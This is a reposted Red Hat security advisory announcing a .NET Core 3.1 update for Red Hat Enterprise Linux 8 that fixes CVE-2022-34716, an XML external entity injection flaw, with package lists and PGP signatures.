pGX55k4jDNCcpC3fZwDmLDo68Yx6mKE1AGimgn1kp4+CDfy0CqzIzw+ASzv3yFLh  
LXgBZXURM57xjIGw86GqvKzrvFwogJx4PNLXG7mBbyloC5ftn0LOCtUnT6ufvYnc  
aqgbgVExdWjP8WKfHB3z1KCkQOrih4/QOZskQRfdqJLjmkjopv4mLjDxE7vhCO+a  
buMc0LrYxag=rjcs  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6066-01

Red Hat Security Advisory 2022-6057-01 - .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 3.1.422 and .NET Runtime 3.1.28.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: .NET Core 3.1 security, bug fix, and enhancement update  
Advisory ID:       RHSA-2022:6057-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6057  
Issue date:        2022-08-15  
CVE Names:         CVE-2022-34716  
====================================================================  
1. Summary:

An update for .NET Core 3.1 is now available for Red Hat Enterprise Linux  
8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 8) - x86_64  
Red Hat Enterprise Linux AppStream (v. 8) - x86_64

3. Description:

.NET is a managed-software framework. It implements a subset of the .NET  
framework APIs and several new APIs, and it includes a CLR implementation.

New versions of .NET that address a security vulnerability are now  
available. The updated versions are .NET SDK 3.1.422 and .NET Runtime  
3.1.28.

Security Fix(es):

* dotnet: External Entity Injection during XML signature verification  
(CVE-2022-34716)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2115183 - CVE-2022-34716 dotnet: External Entity Injection during XML signature verification

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
dotnet3.1-3.1.422-1.el8_6.src.rpm

x86_64:  
aspnetcore-runtime-3.1-3.1.28-1.el8_6.x86_64.rpm  
aspnetcore-targeting-pack-3.1-3.1.28-1.el8_6.x86_64.rpm  
dotnet-apphost-pack-3.1-3.1.28-1.el8_6.x86_64.rpm  
dotnet-apphost-pack-3.1-debuginfo-3.1.28-1.el8_6.x86_64.rpm  
dotnet-hostfxr-3.1-3.1.28-1.el8_6.x86_64.rpm  
dotnet-hostfxr-3.1-debuginfo-3.1.28-1.el8_6.x86_64.rpm  
dotnet-runtime-3.1-3.1.28-1.el8_6.x86_64.rpm  
dotnet-runtime-3.1-debuginfo-3.1.28-1.el8_6.x86_64.rpm  
dotnet-sdk-3.1-3.1.422-1.el8_6.x86_64.rpm  
dotnet-sdk-3.1-debuginfo-3.1.422-1.el8_6.x86_64.rpm  
dotnet-targeting-pack-3.1-3.1.28-1.el8_6.x86_64.rpm  
dotnet-templates-3.1-3.1.422-1.el8_6.x86_64.rpm  
dotnet3.1-debuginfo-3.1.422-1.el8_6.x86_64.rpm  
dotnet3.1-debugsource-3.1.422-1.el8_6.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 8):

x86_64:  
dotnet-apphost-pack-3.1-debuginfo-3.1.28-1.el8_6.x86_64.rpm  
dotnet-hostfxr-3.1-debuginfo-3.1.28-1.el8_6.x86_64.rpm  
dotnet-runtime-3.1-debuginfo-3.1.28-1.el8_6.x86_64.rpm  
dotnet-sdk-3.1-debuginfo-3.1.422-1.el8_6.x86_64.rpm  
dotnet-sdk-3.1-source-built-artifacts-3.1.422-1.el8_6.x86_64.rpm  
dotnet3.1-debuginfo-3.1.422-1.el8_6.x86_64.rpm  
dotnet3.1-debugsource-3.1.422-1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-34716  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYvo3BdzjgjWX9erEAQiqDA//ZkYPeqalj7sdjnZ3/0Ke/t/4LCdqTiGM  
SAkYITxvUUavido2T9woQPs9b8WQEwTCkfj1nELZMUV+WQcumGAj9ecghAgD/uLj  
jOIL+IueInXQdaEvd5yYEZJstkmcM2kcrBsfk4yqnQmBxAPu+bLMWDknvekd2RHl  
jeONmL+6GSErtoaTd6P3gaX0zF3m9NtQLckXR71eAs2G5P4NYYMKAyLIq7H7gmfY  
rc7lzxIng6kmt6UYFEwGvFwzHyTWs8PurJGHdC1CYQsH3HlbRqhGBAnTVVt3wvPo  
j/IrIQ6tBakjNMzCe3sdmwwX8/j0U6z47S9ibrfSbh+zNo4PS06B3dPJolLshrWP  
ORxUhrx/7ctgE0shUERIxhLG+qhnr5KEh/wdP3TJkKcgcm9B3QIlFlfNq/i4twwK  
M4GD/WjY8N4+q/uB4veyTmGM0njmYDrbkEDRn3HLtGlMjyROQIN0F5bt1DLJDxRr  
DkVxT0oyZRrUULGMTRj0TmQ53wpeO06/w27sLcSEmrnOW86JnIZ01zMQvUR2vGl+  
wQAWiU43Bj0K1ULrJootfQWT1UdIQyBATufGt2SIHfuCCO9f9FJ1fQOgvZYHH8Ai  
zh4BdCojW/AzTW+wflHvujpqkZc+JgKmjnfLV2zSm7Cpv8BHegvC+cE+kjwxvyHQ  
XQKOcicCSUE=eurD  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#js